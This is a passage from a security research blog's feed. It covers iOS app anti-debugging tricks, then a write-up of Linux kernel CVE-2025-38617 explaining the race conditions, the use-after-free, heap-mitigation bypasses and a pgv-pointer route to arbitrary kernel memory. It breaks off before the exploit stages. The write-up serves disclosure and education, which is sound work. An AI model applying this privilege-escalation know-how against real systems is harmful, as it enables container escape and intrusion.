srcset="https://substackcdn.com/image/fetch/$s_!ICQe!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ICQe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg" width="1442" height="488" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:488,&quot;width&quot;:1442,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:151988,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/191281303?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ICQe!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption"><em>This iOS app, running on macOS, corrupted the registers before crashing</em>.</figcaption></figure></div><p>This makes it difficult to trace where the detection actually occurred. Even if you hit the right code path, the information you get back is already corrupted.</p><p>It does not prevent debugging entirely, but it slows things down. You have to find the check before the crash instead of relying on the crash itself.</p><p><strong>Technique: Register corruption for analysis resistance</strong></p><ul><li><p>Overwrite register state before crashing</p></li><li><p>Produce garbage register values in crash logs</p></li><li><p>Obscure the origin of detection logic and break backtraces</p></li></ul><h2>5. The App That Let iOS Do the Killing</h2><p>One game app produced probably the weirdest &#8220;crash&#8221; we have dealt with. The app would run, and as soon as we tried to debug it, it would get terminated without leaving any crash logs.</p><p>The reason was memory pressure. Instead of crashing directly through abort() or access violations, the app pushed memory usage high enough to trigger a jetsam condition. On iOS, jetsam is a kernel mechanism that kills processes when the system is under memory pressure or when an app exceeds its memory limits.</p><p>Because the system performs the termination, there is no normal crash log. You only get a jetsam record, and the anti-debug detection logic does not show up in any backtrace.</p><p>In this case, this behavior was combined with other checks such as jailbreak detection and tracing, which removes the usual approach of following a crash to locate the check.</p><p><strong>Technique: Resource exhaustion to trigger jetsam</strong></p><ul><li><p>Allocate excessive memory to force OS-level termination</p></li><li><p>Avoid generating application crash logs</p></li><li><p>Leave only system-level jetsam records</p></li></ul><h2>6. The App That Kept Checking</h2><p>Some apps pass the initial checks but still fail later.</p><p>In these cases, detection continues in the background and is enforced with delay. When a check fails, the app may record the state and only terminate after a timer elapses. That delay makes it harder to link the crash to the original trigger.</p><p>There is often a periodic task acting as a heartbeat. It wakes up at fixed intervals and re-runs parts of the detection logic, so passing checks once does not mean you are in the clear.</p><p>This setup makes behavior less predictable. Failures can happen later, without a clear signal of what caused them.</p><p><strong>Technique: Continuous detection with delayed enforcement</strong></p><ul><li><p>Record tamper state and trigger crashes after a delay</p></li><li><p>Use timers to decouple detection from enforcement</p></li><li><p>Run periodic heartbeat tasks to re-check state</p></li><li><p>Re-trigger enforcement even after initial checks pass</p></li></ul><h2>Conclusion</h2><p>Taken together, these examples show how things have changed. What used to be a single check or a simple <code>ptrace()</code> call is now a combination of techniques. Environment checks happen early, debugger detection is enforced at runtime, crash logs are made useless, and in some cases removed entirely through jetsam. On top of that, integrity checks and timed enforcement add another layer that keeps running after launch.</p><p>None of these techniques are especially complex on their own. The difficulty comes from how they are combined. You are not dealing with one mechanism, but a system where each part covers gaps left by the others.</p><p>For readers who are familiar with protection systems on Windows (anti-cheat, anti-debug, anti-tampering, etc.), you may wonder why they don&#8217;t use more aggressive techniques such as kernel level drivers and code injection. The answer is that iOS has a different security model and it does not allow kernel extensions or unsigned code execution.</p>]]></content:encoded></item><item><title><![CDATA[A Race Within A Race: Exploiting CVE-2025-38617 in Linux Packet Sockets]]></title><description><![CDATA[A step-by-step guide to exploiting a 20-year-old bug in the Linux kernel to achieve full privilege escalation and container escape, plus a cool bug-hunting heuristic.]]></description><link>https://blog.calif.io/p/a-race-within-a-race-exploiting-cve</link><guid isPermaLink="false">https://blog.calif.io/p/a-race-within-a-race-exploiting-cve</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Tue, 03 Mar 2026 18:32:13 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!CIRL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Table of Contents</h2><ul><li><p><a href="https://blog.calif.io/i/189789999/introduction">Introduction</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/background">Background</a></p><ul><li><p><a href="https://blog.calif.io/i/189789999/packet-sockets">Packet Sockets</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/ring-buffers-and-tpacketv3">Ring Buffers and TPACKET_V3</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/extended-attributes-and-simplexattr">Extended Attributes and simple_xattr</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/slab-allocator-vs-page-allocator">Slab Allocator vs Page Allocator</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/kernel-heap-mitigations">Kernel Heap Mitigations</a></p></li></ul></li><li><p><a href="https://blog.calif.io/i/189789999/the-vulnerability">The Vulnerability</a></p><ul><li><p><a href="https://blog.calif.io/i/189789999/the-conditional-zeroing-bug">The Conditional Zeroing Bug</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/the-race-window-and-uaf">The Race Window and UAF</a></p></li></ul></li><li><p><a href="https://blog.calif.io/i/189789999/the-key-insight-sleeping-mutex-holders-stretch-race-windows">The Key Insight: Sleeping Mutex Holders Stretch Race Windows</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/the-exploit">The Exploit</a></p><ul><li><p><a href="https://blog.calif.io/i/189789999/stage-0-winning-the-races">Stage 0: Winning the Races</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-1-page-overflow-primitive-via-xattr-corruption">Stage 1: Page Overflow Primitive (via xattr corruption)</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-2-heap-readwrite-via-pgv-overlap">Stage 2: Heap Read/Write via pgv Overlap</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-3-arbitrary-page-readwrite-via-pgv-overlap">Stage 3: Arbitrary Page Read/Write via pgv Overlap</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-4-kaslr-bypass-via-pipe-buffer">Stage 4: KASLR Bypass via Pipe Buffer</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-5-privilege-escalation-via-syscall-patching">Stage 5: Privilege Escalation via Syscall Patching</a></p></li></ul></li><li><p><a href="https://blog.calif.io/i/189789999/the-fix">The Fix</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/takeaways">Takeaways</a></p></li></ul><h2>Introduction</h2><p>CVE-2025-38617 is a use-after-free vulnerability in the Linux kernel&#8217;s packet socket subsystem, caused by a race condition between packet_set_ring() and packet_notifier(). The bug has existed since Linux 2.6.12 (2005) and was fixed in kernel version 6.16. It allows an unprivileged local attacker &#8212; needing only CAP_NET_RAW, obtainable through user namespaces &#8212; to achieve full privilege escalation and container escape.</p><p>The vulnerability and exploits were discovered and developed by Quang Le, a member of <a href="https://calif.io">Calif</a>, and submitted as part of Google&#8217;s <a href="https://google.github.io/security-research/kernelctf/rules.html">kernelCTF</a> program. Calif provides this complimentary write-up to offer additional background for educational purposes.</p><p>This article analyzes the vulnerability, the <a href="https://github.com/google/security-research/pull/339">exploit submission</a>, and the two-line fix. The exploit is notable for its sophistication: it defeats modern kernel mitigations including CONFIG_RANDOM_KMALLOC_CACHES and CONFIG_SLAB_VIRTUAL, builds exploit primitives through a chain of four increasingly powerful stages, and uses creative timing techniques to win two separate race conditions deterministically.</p><p>But perhaps the most interesting aspect is the <em>bug-finding heuristic</em> it demonstrates: <strong>when a mutex holder sleeps, the time window between lock release and the next critical operation becomes predictable and stretchable, turning otherwise unexploitable code sequences into reliable race conditions.</strong></p><ul><li><p><strong>Affected versions</strong>: Linux 2.6.12 through 6.15</p></li><li><p><strong>Affected component</strong>: net/packet/af_packet.c (packet socket subsystem)</p></li><li><p><strong>Root cause</strong>: Race condition leading to use-after-free</p></li><li><p><strong>Required capability</strong>: CAP_NET_RAW (available via unprivileged user namespaces)</p></li><li><p><strong>Fix commit</strong>: <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36">01d3c8417b9c</a></p></li></ul><h2>Background</h2><h3>Packet Sockets</h3><p>Linux packet sockets (AF_PACKET) provide raw access to network interfaces at the link layer. They&#8217;re used by tools like tcpdump and wireshark to capture network traffic. When a packet arrives on a network interface, the kernel delivers a copy to any packet socket &#8220;hooked&#8221; to that interface through a registered protocol hook function.</p><p>Packet sockets have a lifecycle tied to network interface state:</p><ul><li><p>When the interface goes <strong>UP</strong>, the packet socket&#8217;s protocol hook is registered, and the socket enters the PACKET_SOCK_RUNNING state. It can now receive packets.</p></li><li><p>When the interface goes <strong>DOWN</strong>, the hook is unregistered, and the socket stops receiving packets.</p></li></ul><p>These transitions are managed by packet_notifier(), which handles NETDEV_UP and NETDEV_DOWN events.</p><h3>Ring Buffers and TPACKET_V3</h3><p>For high-performance packet processing, packet sockets support memory-mapped ring buffers. Instead of copying each packet through recvmsg(), the kernel writes packets directly into a shared memory region that userspace can mmap(). The ring buffer is configured through setsockopt() with PACKET_RX_RING (for receiving) or PACKET_TX_RING (for transmitting), which internally calls packet_set_ring().</p><p>The ring buffer consists of multiple &#8220;blocks,&#8221; each a contiguous allocation of kernel pages. These blocks are tracked by an array of struct pgv pointers:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;0e9fca7c-2ceb-4aca-b05c-f67f1e1ce280&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct pgv {
    char *buffer;  // pointer to one block of pages
};</code></pre></div><p>The alloc_pg_vec() function allocates this array and each block:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;5dd519b5-340f-481f-a3c4-98d829d2522f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
    unsigned int block_nr = req-&gt;tp_block_nr;
    struct pgv *pg_vec;
    pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
    for (i = 0; i &lt; block_nr; i++) {
        pg_vec[i].buffer = alloc_one_pg_vec_page(order);
    }
    return pg_vec;
}</code></pre></div><p><strong>How userspace accesses ring buffer blocks: mmap().</strong> When userspace calls mmap() on a packet socket file descriptor, the kernel&#8217;s packet_mmap() handler walks the pgv array and maps each block&#8217;s pages into the calling process&#8217;s virtual address space as a single contiguous region. Block 0&#8217;s pages appear first, followed by block 1&#8217;s pages, and so on. The result is that userspace gets a pointer to a memory region where offset 0 is the start of block 0, offset block_size is the start of block 1, etc. Reads/writes to this region go directly to the kernel pages backing the ring buffer, with no syscall overhead.</p><p>This mapping is based on what pgv[N].buffer points to <strong>at mmap time</strong>. The kernel resolves each pgv entry to its underlying physical page and maps that page into userspace. This has a critical implication for the exploit: if an attacker can overwrite a pgv[N].buffer pointer to an arbitrary kernel address and then call mmap(), the kernel will map whatever page lives at that address into userspace &#8212; giving the attacker direct read/write access to arbitrary kernel memory. This is exactly how Stages 2 and 3 escalate from a single corrupted pointer to full arbitrary page read/write.</p><p>TPACKET_V3, the most recent version of the packet socket ring buffer protocol, adds a block descriptor structure (tpacket_kbdq_core) that tracks which block is currently active, where the next packet header should be written, and when to retire (close) a full block and move to the next. Key fields include:</p><ul><li><p>pkbdq: pointer to the pgv array (the ring buffer itself)</p></li><li><p>kactive_blk_num: index of the currently active block</p></li><li><p>nxt_offset: pointer to where the next packet will be written within the current block</p></li><li><p>kblk_size: size of each block</p></li><li><p>knum_blocks: total number of blocks</p></li><li><p>blk_sizeof_priv: size of the per-block private area</p></li></ul><p>Each block&#8217;s memory layout starts with a tpacket_block_desc header (48 bytes after alignment), followed by a <strong>private area</strong> of blk_sizeof_priv bytes, and then the actual packet data region. The private area is configured by userspace via the tp_sizeof_priv field of the tpacket_req3 structure passed to setsockopt(PACKET_RX_RING). The kernel reserves this space at the start of each block and never writes packet data into it &#8212; it exists so that userspace applications can store their own per-block metadata (e.g., custom timestamps or statistics). The packet write cursor (nxt_offset) is initialized to block_start + 48 + ALIGN(blk_sizeof_priv, 8), skipping past both the header and the private area. As we&#8217;ll see, the exploit sets tp_sizeof_priv = 16248 to position the write cursor precisely where it needs to overflow into an adjacent object.</p><p>When a packet arrives, tpacket_rcv() is called, which looks up the current block via pkbdq[kactive_blk_num].buffer, finds the write position (nxt_offset), copies the packet data, and writes metadata headers. This is the function that will access freed memory in our vulnerability.</p><h3>Extended Attributes and simple_xattr</h3><p>Extended attributes (xattrs) are name-value pairs that can be attached to files and directories, providing metadata beyond the standard file attributes (permissions, timestamps, etc.). They&#8217;re organized into namespaces &#8212; security.* for SELinux labels and capabilities, user.* for arbitrary user data, trusted.* for privileged metadata, and so on. Userspace interacts with them through three syscalls: setxattr() to create or update, getxattr() to read, and removexattr() to delete.</p><p>Most filesystems store xattrs on disk, but in-memory filesystems like <strong>tmpfs</strong> have no disk backing. Instead, tmpfs stores xattrs entirely in kernel memory using the simple_xattr infrastructure. Each xattr is represented by a struct simple_xattr. On Linux 6.6 (which the exploit targets), xattrs are organized in a <strong>red-black tree</strong>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;75ef4686-3fc6-4209-a7c3-daaafbd80a83&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct rb_node {
    unsigned long  __rb_parent_color;  // parent pointer + color bit
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};  // 24 bytes

struct simple_xattr {
    struct rb_node rb_node;  // offset 0,  size 24 (tree node pointers)
    char *name;              // offset 24, size 8
    size_t size;             // offset 32, size 8  &#8592; overflow target
    char value[];            // offset 40          (inline value)
};  // total header: 40 bytes</code></pre></div><p>The rb_node at the start of the struct contains three pointers: __rb_parent_color (the parent pointer with the color bit encoded in the lowest bit), rb_right, and rb_left. These point to other simple_xattr nodes in the same red-black tree.</p><p>When userspace calls setxattr(&#8221;security.foo&#8221;, value, size) on a tmpfs file, the kernel allocates a simple_xattr, copies the name and value, and inserts it into the inode&#8217;s collection. When getxattr() is called, the kernel traverses the collection comparing names, and when it finds a match, copies size bytes from value[] to the userspace buffer. If the userspace buffer is smaller than size, the kernel returns ERANGE &#8212; a behavior the exploit uses to detect corruption.</p><p>The simple_xattr is an ideal exploitation target for several reasons:</p><ol><li><p><strong>Controlled allocation size.</strong> The kmalloc(header + value_size) allocation can be steered to any slab cache or page order by choosing the right value_size. With value_size = 8192, the total allocation (40 + 8,192 = 8,232 bytes) is served from order-2 pages (16 KB).</p></li></ol><ol start="2"><li><p><strong>Controlled content.</strong> The value[] data is fully attacker-controlled, and the name string is chosen by the attacker.</p></li></ol><ol start="3"><li><p><strong>Readable and writable via syscalls.</strong> getxattr() reads size bytes starting from value[] &#8212; if size is corrupted to a larger value, the kernel reads past the object&#8217;s actual data, leaking adjacent heap memory. setxattr() can update the value. removexattr() frees the object.</p></li></ol><ol start="4"><li><p><strong>Address leaking via node pointers.</strong> The rb_node pointers contain kernel addresses of neighboring nodes in the tree. If an attacker can read these pointers, they learn the kernel addresses of other simple_xattr objects &#8212; the starting point for building further primitives.</p></li></ol><ol start="5"><li><p><strong>Sprayable.</strong> Creating thousands of xattrs on a single tmpfs file is trivial &#8212; just call setxattr() in a loop with unique names (&#8221;security.groom_0&#8221;, &#8220;security.groom_1&#8221;, ...). The exploit sprays 2,048 of them to fill the heap predictably.</p></li></ol><h3>Slab Allocator vs Page Allocator</h3><p>The Linux kernel has two layers of memory allocation, and understanding the boundary between them is essential to this exploit.</p><p>The <strong>page allocator</strong> (also called the buddy allocator) is the bottom layer. It manages physical memory in power-of-2 page chunks: order-0 (4 KB), order-1 (8 KB), order-2 (16 KB), and so on. Every allocation is page-aligned. When pages are freed, adjacent free pages of the same order merge (&#8221;buddy&#8221;) into higher-order blocks. Crucially, the page allocator has <strong>no segregation by type</strong> &#8212; all order-2 pages come from the same freelist. A freed order-2 page from a simple_xattr value can be reclaimed by an order-2 pgv array allocation; the page allocator doesn&#8217;t know or care what the pages are used for.</p><p>The <strong>slab allocator</strong> (SLUB on modern kernels) sits on top of the page allocator. It requests pages from the buddy allocator and carves them into fixed-size slots for small objects. It has generic size classes (kmalloc-8, kmalloc-16, ... kmalloc-8k) and dedicated caches for specific struct types. Unlike the page allocator, slab caches are <strong>segregated</strong> &#8212; a freed kmalloc-192 slot returns to its specific cache, and can only be reclaimed by another kmalloc-192 allocation.</p><p>This boundary is the reason the exploit forces certain allocations to exceed kmalloc-8k (the largest generic slab bucket). An 8,200-byte pgv array can&#8217;t fit in kmalloc-8k, so the allocator falls through to the page allocator, where the exploit&#8217;s heap grooming controls which freed pages get reclaimed. If the allocation stayed within the slab, freed xattr pages and pgv arrays would live in completely different caches with no way to reclaim each other.</p><h3>Kernel Heap Mitigations</h3><p>The kernelCTF mitigation-v4-6.6 environment enables two modern heap mitigations that make traditional cross-cache attacks significantly harder.</p><p><strong>CONFIG_RANDOM_KMALLOC_CACHES</strong> introduces 16 separate slab caches for each kmalloc size class (e.g., kmalloc-rnd-01-32, kmalloc-rnd-02-32, ... kmalloc-rnd-16-32). When the kernel calls kmalloc(), the allocation is routed to one of these 16 caches based on a hash of the <strong>call site address</strong> combined with a per-boot random seed. The goal is to prevent an attacker from predicting which cache an allocation lands in, breaking the classic exploit pattern of freeing object A from cache X and reclaiming it with object B from the same cache X. Since A and B come from different call sites, they&#8217;ll likely land in different random caches and the reclamation fails.</p><p>The bypass: if two allocations come from the <strong>same call site</strong> (the same line of source code that calls kmalloc/kcalloc), they always hash to the same random cache, regardless of the boot seed. The exploit exploits this by using alloc_pg_vec() &#8212; the same function, the same kcalloc() call site &#8212; for both the victim ring buffer and the reclamation ring buffer. Both are pgv arrays allocated via kcalloc(block_nr, sizeof(struct pgv), ...) inside alloc_pg_vec(), so they&#8217;re guaranteed to land in the same random cache.</p><p><strong>CONFIG_SLAB_VIRTUAL</strong> (also known as &#8220;virtual slab&#8221;) ensures that the virtual address range used for one slab cache type is never reused for a different slab cache type. In a normal kernel, freed slab pages can be returned to the page allocator and reallocated to a completely different slab cache, allowing cross-cache attacks. With CONFIG_SLAB_VIRTUAL, each cache gets a dedicated virtual address range &#8212; an allocation from kmalloc-64 will always map to a kmalloc-64 virtual address, even after being freed and reallocated. If an attacker frees a kmalloc-64 object and tries to reclaim it with a kmalloc-128 object, the virtual addresses won&#8217;t overlap.</p><p>The bypass is the same principle: by reclaiming freed ring buffer memory with another ring buffer (same object type, same slab cache), the virtual addresses remain valid. The exploit doesn&#8217;t need cross-cache attacks &#8212; it uses ring buffers to reclaim ring buffers throughout.</p><p>These mitigations force the exploit author into a disciplined pattern: every reclamation must use the same object type from the same call site. As we&#8217;ll see, this constraint shapes the entire exploit architecture &#8212; from using TX ring buffers to reclaim RX ring buffers, to spraying pgv arrays to reclaim other pgv arrays.</p><h2>The Vulnerability</h2><h3>The Conditional Zeroing Bug</h3><p>The root cause is a logic error in packet_set_ring(). When reconfiguring a ring buffer, this function needs to temporarily unhook the packet socket from the network interface to ensure no packets arrive while the ring buffer is being swapped. Here&#8217;s the relevant code:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;50abf75b-4b4b-4918-86be-344153887ae5&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        int closing, int tx_ring)
{
    // ...
    spin_lock(&amp;po-&gt;bind_lock);
    was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
    num = po-&gt;num;
    if (was_running) {
        WRITE_ONCE(po-&gt;num, 0);    // Only zeroed if was_running!
        __unregister_prot_hook(sk, false);
    }
    spin_unlock(&amp;po-&gt;bind_lock);

    synchronize_net();

    mutex_lock(&amp;po-&gt;pg_vec_lock);
    // ... swap ring buffers, free old ring ...
    mutex_unlock(&amp;po-&gt;pg_vec_lock);

    spin_lock(&amp;po-&gt;bind_lock);
    if (was_running) {
        WRITE_ONCE(po-&gt;num, num);   // Only restored if was_running!
        register_prot_hook(sk);
    }
    spin_unlock(&amp;po-&gt;bind_lock);
}</code></pre></div><p>The critical issue is the if (was_running) conditional around WRITE_ONCE(po-&gt;num, 0). The po-&gt;num field determines the protocol number the socket is registered for. When it&#8217;s non-zero, the NETDEV_UP handler in packet_notifier() will re-register the protocol hook:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;9d3b9bb0-e444-43ed-a899-a7b1c38963c9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">case NETDEV_UP:
    if (dev-&gt;ifindex == po-&gt;ifindex) {
        spin_lock(&amp;po-&gt;bind_lock);
        if (po-&gt;num)                    // &lt;-- checks po-&gt;num
            register_prot_hook(sk);     // re-hooks the socket!
        spin_unlock(&amp;po-&gt;bind_lock);
    }
    break;</code></pre></div><p><strong>The bug</strong>: If the packet socket is <em>not</em> currently running when packet_set_ring() is called, po-&gt;num retains its original non-zero value. After spin_unlock(&amp;po-&gt;bind_lock), there is a window where packet_set_ring() has released the bind lock but has not yet finished reconfiguring the ring buffer. If a NETDEV_UP event arrives during this window, packet_notifier() sees po-&gt;num != 0 and calls register_prot_hook(), re-hooking the socket to the network interface. Now the socket can receive packets while packet_set_ring() is in the middle of freeing and replacing the ring buffer.</p><h3>The Race Window and UAF</h3><p>The exploit triggers the vulnerability through a two-race sequence:</p><p><strong>Race 1: packet_set_ring() vs packet_notifier()</strong></p><p>The attacker ensures the packet socket is bound to a network interface but <em>not</em> running (the interface is DOWN). Then:</p><ol><li><p>Call packet_set_ring() to free the existing RX ring buffer</p></li><li><p>After packet_set_ring() releases bind_lock but before it acquires pg_vec_lock, bring the interface UP</p></li><li><p>packet_notifier() sees po-&gt;num != 0, re-registers the protocol hook</p></li><li><p>The socket is now &#8220;running&#8221; and can receive packets, even though packet_set_ring() hasn&#8217;t finished</p></li></ol><p><strong>Race 2: packet_set_ring() vs tpacket_rcv()</strong></p><p>Now that the hook is registered, sending a packet to the interface triggers tpacket_rcv(). This function reads the ring buffer metadata (prb_bdqc) which still points to the old ring buffer. Meanwhile, packet_set_ring() proceeds to free that same ring buffer inside the pg_vec_lock critical section:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;024aaeb0-c1bd-4911-a52f-904014d64833&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">mutex_lock(&amp;po-&gt;pg_vec_lock);
    swap(rb-&gt;pg_vec, pg_vec);     // pg_vec now holds old ring buffer
    // ...
mutex_unlock(&amp;po-&gt;pg_vec_lock);
// ...
free_pg_vec(pg_vec, order, req-&gt;tp_block_nr);  // free the old ring!</code></pre></div><p>If tpacket_rcv() accesses the ring buffer after it has been freed, we have a <strong>use-after-free</strong>. The TPACKET_V3 prb_bdqc structure is particularly useful for exploitation because its pointers to the ring buffer (pkbdq, nxt_offset, pkblk_start, etc.) are <strong>not</strong> zeroed when the ring is freed. The freed pg_vec array has its individual buffer pointers set to NULL by free_pg_vec(), but the prb_bdqc still holds the stale addresses.</p><h2>The Key Insight: Sleeping Mutex Holders Stretch Race Windows</h2><p>The most important takeaway from this exploit &#8212; and a generalizable bug-finding heuristic for kernel security researchers &#8212; is this: <strong>if you can make a mutex holder sleep, you can stretch the time window between any lock release and subsequent lock acquisition to an arbitrary duration</strong>.</p><p>In packet_set_ring(), there&#8217;s a critical gap between releasing bind_lock and acquiring pg_vec_lock:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;ce6e38a4-fe6a-4f7a-a29c-9d36a9505a35&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">spin_unlock(&amp;po-&gt;bind_lock);    // Race 1 window opens
synchronize_net();
mutex_lock(&amp;po-&gt;pg_vec_lock);   // Race 1 window closes</code></pre></div><p>Normally, synchronize_net() completes quickly and mutex_lock() succeeds immediately, making this window very tight. But the pg_vec_lock mutex is also acquired by tpacket_snd():</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;61525ef9-7f41-4ab1-9313-142e21fc56c0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static int tpacket_snd(struct packet_sock *po, struct msghdr *msg)
{
    mutex_lock(&amp;po-&gt;pg_vec_lock);       // holds the mutex
    // ...
    timeo = wait_for_completion_interruptible_timeout(
        &amp;po-&gt;skb_completion, timeo);    // SLEEPS while holding it!
    // ...
    mutex_unlock(&amp;po-&gt;pg_vec_lock);
